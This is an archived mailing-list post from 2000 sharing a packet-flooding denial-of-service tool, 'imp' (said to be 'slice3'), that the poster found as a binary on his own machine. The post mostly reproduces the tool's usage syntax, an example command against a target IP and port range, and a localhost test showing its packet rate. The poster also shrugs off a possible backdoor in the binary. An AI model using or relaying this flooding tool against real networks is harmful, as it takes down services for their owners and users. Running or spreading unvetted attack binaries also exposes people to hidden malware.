Vulnerability Development mailing list archives

weird DoS tool like Slice

From: Guilherme Mesquita <guy () linuxbr com br>
Date: Wed, 27 Sep 2000 21:43:06 -0700

I found this DoS tool in one of my boxes. I only have the binary, so dont
ask me for the source. Also I dont want any problems with people because I
know this is private (it says when I run the appz) but I think this is
quite old so I dont mind posting it here. And if you find a backdoor in the
binary file, I DONT CARE, you ran the file, so that's your problem. I didnt
find any so better luck for you. Disassemble it how much you want.

Also it's for libc5, it's dynamically linked, so if it doesnt work for you,
I'm sorry.

I think you already know the good Syn flooder "slice"... and slice2... Well
some people say this is "slice3".

here it is:

bash# ./imp

imp.c (v.331) by sinkhole - Proof of Concept for private educational use
only
-PRIVATE- REGISTERED FOR: pnt

WARNING: Using this program on public networks
is HIGHLY illegal and they WILL find you and put
you in jail. The author is no way responsible for
your actions. Keep this one to your local network!

[seconds to run for]
    src ip block     = a block of computers, ie: 10.32.8 (put 0 for random)
        -Note: random only works on misconfigured networks now-a-days.
    dst computer     = computer to receive the packets.
    begin port       = port to begin flooding, ie: 1
    end port         = last port to flood, ie: 150
    types            = 1=SYN 2=ACK 3=FIN 4=RST
    seconds to run   = If not specified it will run until killed.

Ie: ./imp 10.223 10.2.0.1 1 150 1 30

ok, now just a quick test:

bash# ./imp 127 127.0.0.1 1 2 3 5
Done! - Statistics: 94294 packets sent in 5 seconds; 994 kbyte/s
(lol, try this with your ppp ;)

guy.